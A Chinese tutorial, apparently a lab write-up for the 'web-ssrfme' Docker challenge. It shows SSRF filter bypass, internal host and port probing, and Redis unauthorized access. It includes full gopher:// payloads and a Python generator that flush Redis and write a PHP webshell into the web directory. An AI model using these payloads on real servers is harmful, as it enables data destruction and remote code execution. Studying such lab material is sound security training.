腳本之家服務器常用軟件

快捷導航

Web-ssrfme:redis 未授權訪問攻擊的問題解決

更新時間：2025年04月01日 09:04:53 作者：Komorebi.py

本文主要介紹了Web-ssrfme:redis 未授權訪問攻擊的問題解決,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧

SSRF簡介

SSRF（Server - Side Request Forgery，服務器端請求偽造）是一種網(wǎng)絡安全漏洞，攻擊者利用目標服務器的漏洞，構造惡意請求，讓服務器代替攻擊者去訪問其他內部或外部資源，從而實現(xiàn)攻擊目的。以下是關于 SSRF 的詳細介紹：

原理

SSRF 漏洞通常發(fā)生在服務器端應用程序中，這些應用程序會根據(jù)用戶的輸入或其他條件發(fā)起對其他服務器或資源的請求。攻擊者通過構造精心設計的請求，篡改目標服務器的請求參數(shù)，使得服務器發(fā)送請求到攻擊者指定的目標，而這個目標可能是內部網(wǎng)絡中的敏感服務器、外部的惡意服務器或者是一些受限制的資源。

攻擊方式

探測內部網(wǎng)絡信息：攻擊者可以利用 SSRF 漏洞讓目標服務器去訪問內部網(wǎng)絡中的其他服務器，通過分析響應信息來獲取內部網(wǎng)絡的拓撲結構、服務器列表、端口開放情況等信息，為進一步攻擊做準備。
攻擊內部服務：如果內部網(wǎng)絡中的某些服務存在漏洞，攻擊者可以利用 SSRF 漏洞讓目標服務器向這些服務發(fā)送惡意請求，從而觸發(fā)漏洞，實現(xiàn)對內部服務的攻擊，如獲取敏感數(shù)據(jù)、執(zhí)行命令等。
發(fā)起中間人攻擊：攻擊者可以將目標服務器作為中間人，通過 SSRF 漏洞讓其向外部服務器發(fā)送請求，并在請求過程中篡改請求內容或竊取響應信息，從而實現(xiàn)對通信過程的監(jiān)聽和篡改。
利用第三方服務進行攻擊：有些應用程序會調用第三方服務來完成某些功能，攻擊者可以利用 SSRF 漏洞篡改對第三方服務的請求，讓目標服務器向第三方服務發(fā)送惡意請求，利用第三方服務的漏洞來實現(xiàn)攻擊目的。

項目部署

首先下載web-ssrfme.zip，然后放到虛擬機內，unzip解壓，然后CD到含有docker-compose.yml文件夾目錄下輸入指令進行拖拽docker鏡像

docker-compose up -d

訪問網(wǎng)站

發(fā)現(xiàn)漏洞

 <?php
highlight_file(__file__);
function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    echo curl_exec($ch);
    curl_close($ch);
}

if(isset($_GET['url'])){
    $url = $_GET['url'];

    if(preg_match('/file\:\/\/|dict\:\/\/|\.\.\/|127.0.0.1|localhost/is', $url,$match))
    {

        die('No, No, No!');
    }
    curl($url);
}
if(isset($_GET['info'])){
    phpinfo();
}
?>

源碼中過濾了file協(xié)議、dict協(xié)議、127.0.0.1和localhost

但沒有過濾http協(xié)議和gopher協(xié)議我們使用http協(xié)議進行內網(wǎng)主機存活探測。

?url=https://www.baidu.com

代碼中我們還可以查看phpinfo的信息

?info

查看該頁面信息發(fā)現(xiàn)當前主機的內網(wǎng)ip為172.18.0.3

探測該網(wǎng)段上存活的主機

?url=172.18.0.1:80

?url=172.18.0.2:80

說明172.17.0.2是內網(wǎng)中存活的另一臺主機，并且上面也運行著http服務。但是當前還不能找到攻下這臺內網(wǎng)主機的突破口，我們可以使用ssrf掃描一下這個內網(wǎng)主機的端口，這里使用burpsuite：

開始爆破

發(fā)現(xiàn)除了80端口有顯示，還有6379端口有一個報錯，

這是redis的報錯，這個錯誤提示表明在執(zhí)行 Redis 的GET命令時，傳入的參數(shù)數(shù)量不正確。說明這臺內網(wǎng)主機上還運行著redis服務。

redis 未授權訪問攻擊

接著我們便可以嘗試 redis 未授權了，由于這臺內網(wǎng)主機上還存在一個http服務，所以我們可以將webshell寫入其web目錄，然后用ssrf進行訪問。

這里我們可以利用gopherus工具，或者利用python代碼

第一次嘗試

./gopherus.py --exploit redis

當然要將前面的ip改為172.18.0.2，因為這個ip下運行著redis端口為6379

http://172.25.254.145:8091/?url=gopher://172.18.0.2:6379/_*1%0D%0A%248%0D%0Aflushall%0D%0A*3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2420%0D%0A%0A%0A%3C%3Fphp%20phpinfo()%3B%0A%0A%0D%0A*4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A*4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A*1%0D%0A%244%0D%0Asave%0D%0A%0A

猜測路徑不是默認路徑/var/www/html,可能是其目錄下的子文件夾，我們使用burp掃一下都有哪些目錄，發(fā)現(xiàn)有個upload目錄。

訪問80端口的upload文件夾，發(fā)現(xiàn)是forbidden而不是not found

第二次嘗試

我們繼續(xù)利用工具進行payload生成

發(fā)現(xiàn)還是不行，原因是沒有進行url編碼

第三次嘗試

由于瀏覽器執(zhí)行代碼時會先進行url解碼，所以我們需要將其進行url編碼

測試，然后訪問文件

成功，進入docker中查看該文件

docker exec -it b990fe7e910d /bin/bash

當然還可以利用python代碼來實現(xiàn)構造一個利用 Redis 漏洞來執(zhí)行特定命令的 Gopher 協(xié)議的請求 Payload，如下

import urllib.parse

protocol = "gopher://"
ip = "172.18.0.2"  # 運行著redis的內網(wǎng)主機ip
port = "6379"
shell = "\n\n<?php system(\"cat /flag\");?>\n\n"
filename = "aaaa.php"
path = "/var/www/html/upload"
passwd = ""
cmd = [
    "flushall",
    f"set 1 {shell.replace(' ', '${IFS}')}",
    f"config set dir {path}",
    f"config set dbfilename {filename}",
    "save"
]

if passwd:
    cmd.insert(0, f"AUTH {passwd}")
payload = protocol + ip + ":" + port + "/_"


def redis_format(arr):
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len(x.replace("${IFS}", " "))) + CRLF + x.replace("${IFS}", " ")
    cmd += CRLF
    return cmd


if __name__ == "__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
    print(payload)

結果：

gopher://172.18.0.2:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%248%0D%0Aaaaa.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

同樣進行url編碼